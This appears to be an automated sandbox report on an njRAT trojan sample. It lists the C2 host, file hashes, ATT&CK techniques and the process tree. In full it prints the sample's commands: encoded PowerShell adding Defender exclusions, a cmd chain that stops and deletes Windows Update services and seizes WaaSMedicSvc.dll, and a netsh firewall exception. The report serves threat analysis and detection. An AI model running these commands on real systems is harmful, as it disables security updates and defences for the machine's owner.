njrat | 46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1

Analysis

max time kernel
151s
max time network
155s
platform
windows7_x64
resource
win7-20220718-en
resource tags

arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
submitted
03-08-2022 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
Size

23.2MB
MD5

abb6afb4def4acfdd8cd790a9eef428d
SHA1

bd1fe3b2d4199e4ffbd90541b5604643ac471fc1
SHA256

46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1
SHA512

cedff678884809a7057b81f0a81e23e5756f2c62dab3eb3e5504777a3ad900a76ef37076dfdd07fe6b781f9f4b472202a9748ea5ec88815fae77adaa370e2086

Score

10^/10

njrat hacked discovery evasion exploit persistence pyinstaller trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

pesho.firecho.cc:5552

Mutex

95806694d02a9b98224f6826b0a19e35

Attributes

reg_key
95806694d02a9b98224f6826b0a19e35
splitter
|'|'|

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Executes dropped EXE 6 IoCs

Processes:

Server.exetest.exenitro_generator.exenitro_generator.exeserver.exe

pid process

732 Server.exe
1560 test.exe
1524 nitro_generator.exe
948 nitro_generator.exe
1412
1936 server.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1948 netsh.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1676 takeown.exe
1540 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
732	Server.exe
1560	test.exe
1524	nitro_generator.exe
948	nitro_generator.exe
1412
1936	server.exe

pid	process
1948	netsh.exe

pid	process
1676	takeown.exe
1540	icacls.exe

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe	server.exe

Loads dropped DLL 5 IoCs

Processes:

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exenitro_generator.exe

pid	process
1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1524	nitro_generator.exe
948	nitro_generator.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1676 takeown.exe
1540 icacls.exe

pid	process
1676	takeown.exe
1540	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3762437355-3468409815-1164039494-1000\Software\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .."	server.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

Server.exe

description ioc process

File created C:\Windows\server.exe Server.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1724 sc.exe
1108 sc.exe
1696 sc.exe
1820 sc.exe
520 sc.exe

description	ioc	process
File created	C:\Windows\server.exe	Server.exe

pid	process
1724	sc.exe
1108	sc.exe
1696	sc.exe
1820	sc.exe
520	sc.exe

Detects Pyinstaller 6 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1228 reg.exe
1112 reg.exe
1356 reg.exe
1520 reg.exe
852 reg.exe
1860 reg.exe
672 reg.exe
468 reg.exe
1904 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

900 powershell.exe
304 powershell.exe

pid	process
1228	reg.exe
1112	reg.exe
1356	reg.exe
1520	reg.exe
852	reg.exe
1860	reg.exe
672	reg.exe
468	reg.exe
1904	reg.exe

pid	process
900	powershell.exe
304	powershell.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

powershell.exepowershell.exeserver.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	900	powershell.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeDebugPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: SeTakeOwnershipPrivilege	1676	takeown.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe
Token: 33	1936	server.exe
Token: SeIncBasePriorityPrivilege	1936	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exetest.exeServer.exeserver.execmd.exe

description	pid	process	target process
PID 1968 wrote to memory of 900	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1968 wrote to memory of 900	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1968 wrote to memory of 900	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1968 wrote to memory of 900	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1968 wrote to memory of 732	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1968 wrote to memory of 732	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1968 wrote to memory of 732	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1968 wrote to memory of 732	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1968 wrote to memory of 1560	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1968 wrote to memory of 1560	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1968 wrote to memory of 1560	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1968 wrote to memory of 1560	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1968 wrote to memory of 1524	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1968 wrote to memory of 1524	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1968 wrote to memory of 1524	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1968 wrote to memory of 1524	1968	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1524 wrote to memory of 948	1524	nitro_generator.exe	nitro_generator.exe
PID 1524 wrote to memory of 948	1524	nitro_generator.exe	nitro_generator.exe
PID 1524 wrote to memory of 948	1524	nitro_generator.exe	nitro_generator.exe
PID 1560 wrote to memory of 304	1560	test.exe	powershell.exe
PID 1560 wrote to memory of 304	1560	test.exe	powershell.exe
PID 1560 wrote to memory of 304	1560	test.exe	powershell.exe
PID 732 wrote to memory of 1936	732	Server.exe	server.exe
PID 732 wrote to memory of 1936	732	Server.exe	server.exe
PID 732 wrote to memory of 1936	732	Server.exe	server.exe
PID 732 wrote to memory of 1936	732	Server.exe	server.exe
PID 1936 wrote to memory of 1948	1936	server.exe	netsh.exe
PID 1936 wrote to memory of 1948	1936	server.exe	netsh.exe
PID 1936 wrote to memory of 1948	1936	server.exe	netsh.exe
PID 1936 wrote to memory of 1948	1936	server.exe	netsh.exe
PID 1560 wrote to memory of 1736	1560	test.exe	cmd.exe
PID 1560 wrote to memory of 1736	1560	test.exe	cmd.exe
PID 1560 wrote to memory of 1736	1560	test.exe	cmd.exe
PID 1736 wrote to memory of 1724	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1724	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1724	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1108	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1108	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1108	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1696	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1696	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1696	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1820	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1820	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 1820	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 520	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 520	1736	cmd.exe	sc.exe
PID 1736 wrote to memory of 520	1736	cmd.exe	sc.exe
PID 1560 wrote to memory of 1484	1560	test.exe	conhost.exe
PID 1560 wrote to memory of 1484	1560	test.exe	conhost.exe
PID 1560 wrote to memory of 1484	1560	test.exe	conhost.exe
PID 1560 wrote to memory of 1484	1560	test.exe	conhost.exe
PID 1736 wrote to memory of 1228	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1228	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1228	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1112	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1112	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1112	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 852	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 852	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 852	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1860	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1860	1736	cmd.exe	reg.exe
PID 1736 wrote to memory of 1860	1736	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
"C:\Users\Admin\AppData\Local\Temp\pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAaQB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaABsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcQB3ACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Users\Admin\AppData\Local\Temp\Server.exe
"C:\Users\Admin\AppData\Local\Temp\Server.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\server.exe
"C:\Windows\server.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\server.exe" "server.exe" ENABLE
4⤵
- Modifies Windows Firewall
PID:1948

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAdQBqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBwAHYAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABvAG8AIwA+AA=="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1724

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1108

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1696

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1820

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:520

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1228

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1112

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:852

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1860

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:672

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1540

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1356

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:468

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1904

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1520

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:668

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1376

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1740

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1204

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1588

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1812

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe
"C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1524

C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe
"C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:948

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Server.exe
Filesize
23KB

MD5
b32f05d7c82cace7cc61f072042812d7

SHA1
e952236a47e3e9beffc574e5afd47414dd7b7a13

SHA256
681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe

SHA512
9a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe
Filesize
23KB

MD5
b32f05d7c82cace7cc61f072042812d7

SHA1
e952236a47e3e9beffc574e5afd47414dd7b7a13

SHA256
681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe

SHA512
9a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15242\python310.dll
Filesize
4.2MB

MD5
e9c0fbc99d19eeedad137557f4a0ab21

SHA1
8945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf

SHA256
5783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5

SHA512
74e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe
Filesize
18.9MB

MD5
86ab39312d5c33038d8035855a33dfe9

SHA1
2ae4360c5f3003c909a14dbe90eb58140be0de9e

SHA256
d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16

SHA512
e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26

Download Submit
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe
Filesize
18.9MB

MD5
86ab39312d5c33038d8035855a33dfe9

SHA1
2ae4360c5f3003c909a14dbe90eb58140be0de9e

SHA256
d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16

SHA512
e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26

Download Submit
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe
Filesize
18.9MB

MD5
86ab39312d5c33038d8035855a33dfe9

SHA1
2ae4360c5f3003c909a14dbe90eb58140be0de9e

SHA256
d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16

SHA512
e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.exe
Filesize
4.4MB

MD5
34e11731bc8676b883ae52ad7598c1cb

SHA1
97f1896d5779fb8893f9669c4d1498acd91ebcc4

SHA256
13d1b8e0eb7f74982debaaa2f713606aa4a8b1b35831dc90366f1e0a99f2fd03

SHA512
a7c4ba673938c8a331e9d4ad7a9127f832a0c2eec7e5171e21800dca4b5bd8c45c3f47f2dfc544de11dae2e963bc259a0ee4b919333b1abf2532492209c5b319

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.exe
Filesize
4.4MB

MD5
34e11731bc8676b883ae52ad7598c1cb

SHA1
97f1896d5779fb8893f9669c4d1498acd91ebcc4

SHA256
13d1b8e0eb7f74982debaaa2f713606aa4a8b1b35831dc90366f1e0a99f2fd03

SHA512
a7c4ba673938c8a331e9d4ad7a9127f832a0c2eec7e5171e21800dca4b5bd8c45c3f47f2dfc544de11dae2e963bc259a0ee4b919333b1abf2532492209c5b319

Download Submit
C:\Windows\server.exe
Filesize
23KB

MD5
b32f05d7c82cace7cc61f072042812d7

SHA1
e952236a47e3e9beffc574e5afd47414dd7b7a13

SHA256
681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe

SHA512
9a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63

Download Submit
C:\Windows\server.exe
Filesize
23KB

MD5
b32f05d7c82cace7cc61f072042812d7

SHA1
e952236a47e3e9beffc574e5afd47414dd7b7a13

SHA256
681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe

SHA512
9a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63

Download Submit
\Users\Admin\AppData\Local\Temp\Server.exe
Filesize
23KB

MD5
b32f05d7c82cace7cc61f072042812d7

SHA1
e952236a47e3e9beffc574e5afd47414dd7b7a13

SHA256
681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe

SHA512
9a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI15242\python310.dll
Filesize
4.2MB

MD5
e9c0fbc99d19eeedad137557f4a0ab21

SHA1
8945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf

SHA256
5783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5

SHA512
74e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b

Download Submit
\Users\Admin\AppData\Local\Temp\nitro_generator.exe
Filesize
18.9MB

MD5
86ab39312d5c33038d8035855a33dfe9

SHA1
2ae4360c5f3003c909a14dbe90eb58140be0de9e

SHA256
d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16

SHA512
e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26

Download Submit
\Users\Admin\AppData\Local\Temp\nitro_generator.exe
Filesize
18.9MB

MD5
86ab39312d5c33038d8035855a33dfe9

SHA1
2ae4360c5f3003c909a14dbe90eb58140be0de9e

SHA256
d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16

SHA512
e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26

Download Submit
\Users\Admin\AppData\Local\Temp\nitro_generator.exe
Filesize
18.9MB

MD5
86ab39312d5c33038d8035855a33dfe9

SHA1
2ae4360c5f3003c909a14dbe90eb58140be0de9e

SHA256
d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16

SHA512
e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26

Download Submit
\Users\Admin\AppData\Local\Temp\test.exe
Filesize
4.4MB

MD5
34e11731bc8676b883ae52ad7598c1cb

SHA1
97f1896d5779fb8893f9669c4d1498acd91ebcc4

SHA256
13d1b8e0eb7f74982debaaa2f713606aa4a8b1b35831dc90366f1e0a99f2fd03

SHA512
a7c4ba673938c8a331e9d4ad7a9127f832a0c2eec7e5171e21800dca4b5bd8c45c3f47f2dfc544de11dae2e963bc259a0ee4b919333b1abf2532492209c5b319

Download Submit
memory/268-123-0x0000000000000000-mapping.dmp

Download
memory/304-92-0x00000000028A4000-0x00000000028A7000-memory.dmp

Filesize
12KB

Download
memory/304-84-0x000007FEED9A0000-0x000007FEEE3C3000-memory.dmp

Filesize
10.1MB

Download
